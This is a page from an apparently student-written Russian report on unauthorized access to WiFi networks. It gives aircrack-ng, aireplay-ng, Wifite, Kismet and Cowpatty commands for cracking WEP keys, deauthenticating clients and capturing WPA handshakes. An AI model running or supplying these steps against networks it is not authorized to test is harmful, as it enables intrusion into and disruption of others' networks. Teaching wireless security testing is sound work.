Читать отчет по антикризисному менеджменту: "Обзор методов несанкционированного доступа к сети WiFi" Страница 5

назад (Назад)скачать (Cкачать работу)

Функция "чтения" служит для ознакомления с работой. Разметка, таблицы и картинки документа могут отображаться неверно или не в полном объёме!

сетевые интерфейсы

Iwconfig

Переводим сетевую карту WiFi в режим мониторинга

airmon-ng start wlan0

Сканируем видимые для нас точки доступа

airodump-ng mon0

Перехватываем handshake

airodump-ng -c 11 -w crackme --bssid 22:22:22:22:22:22 mon0

Отключаем пользователей точки доступа

aireplay-ng -b 22:22:22:22:22:22 -h 33:33:33:33:33:33 mon0

Узнаем пароль

aircrack-ng -z -b 22:22:22:22:22:22 crackme*.cap

2.2 Выводы по первому разделу

Благодаря тому что, в WEP шифровании каждый пакет содержит в себе часть ключа, мы с легко и довольно быстро узнали пароль. Так как данная технология уже устарела и в 2004 году IEEE (Институт инженеров электротехники и электроники) объявили WEP устаревшим из-за того, что стандарт «не выполнил поставленные перед собой цели обеспечения безопасности беспроводных сетей».

3. Проникновение в WiFi через ключ WPA/WPA2

По той причине что WPA2 более трудная система шифрования, то нам придется потратить на нее очень много времени, т.к. в отличии WEP шифрования данный ключ практически не имеент уязвимостей. В данной главе я опишу какими распространенными способами возможна атака WiFi и сколько потребуется времени на ее осуществление.

3.1 Способ через команду Airodump-ng

Перехватываем Handshake

Airodump-ng wlan0mon --bssid AC:F1:DF:87:93:2D --channel 11 --write handshake В связи с тем что захват handshake происходит при подключении клиента к точке достопа, то необходимо подождать пока клиент подключится к точке доступа, или помочь клиенту переподключится к точке доступа при помощи деаунтефикации

aireplay-ng -0 10 –a AC:F1:DF:87:93:2D –c 10:68:3F:70:6D:13 wlan0mon

Когда поймается handshake это отобразитс в правом верхнем углу

3.2 Wifite

В терминале вводим wifite и выбираем нужную нам точку доступа.

Утилита начинает ловить handshake Далее как только handshake будет пойман, программа остановит перехват и сохранит handshake в файле/root/hs/k-226_58-98-35-E9-2B-8D.cap.

3.3 Kismet

Для того чтобы запустить Kismet вводим в терминале

Sudo kismet

Откроется программа и будет производить поиск сетей и ловлю handshakeов

Для более точного перехвата ограничиваем поиск по каналу

Выбрав нужную точку доступа и жмем enter, сразу же появится окно в котором будет показана вся информация о точке доступа Должен пойти сбор пакетов. Нас интересуют пакеты Data Packets и Crypt Packets.Их количество должно увеличиваться.Если они равны 0, то либо в сети нет клиентов, либо сетевая карта не перешла в неразборчивый режим.

Проверяем наличие handshakeов через aircrack-ng

aircrack-ng Kismet-20160710-19-04-09-1.pcapdump Видим, что handshakeов нет, ждем некоторое время пока не перехватит handshake

Как только сы обнаружим что handshake пойман, можно закрыть kismet и работать с handshakeом

Сохранение будет в виде Kismet-20160710-19-04-09-1.pcapdump

3..4 Cowpatty

Выполняем захват командой

airodump-ng --bssid AC:F1:DF:87:93:2D -c 11 -w cowpatty wlan0mon

3.5 Выводы по второму разделу

В это разделе было показано как захватывать handshake, то есть это нам надо для того что бы расшифровать пароль. Сам Handshake состоит из пакетов при подключения клиента к WiFi. Все пакеты зашифрованы, но работа (расшифровка) с перехваченными данными рукопожатия будет рассмотрена в следующей главе

4. Фильтрация handshake

Фильтрация handshake необходима для того что бы отбросить все лишние пакеты, оставив нужные нам, тем самы облегчить скорость

4.1 Cowpatty

cowpatty -r handshake-01.cap -c

-r указывает файл для проверки

-с указывает что нам надо проверить handshake а не взламывать его

4.2 Wireshark


Интересная статья: Быстрое написание курсовой работы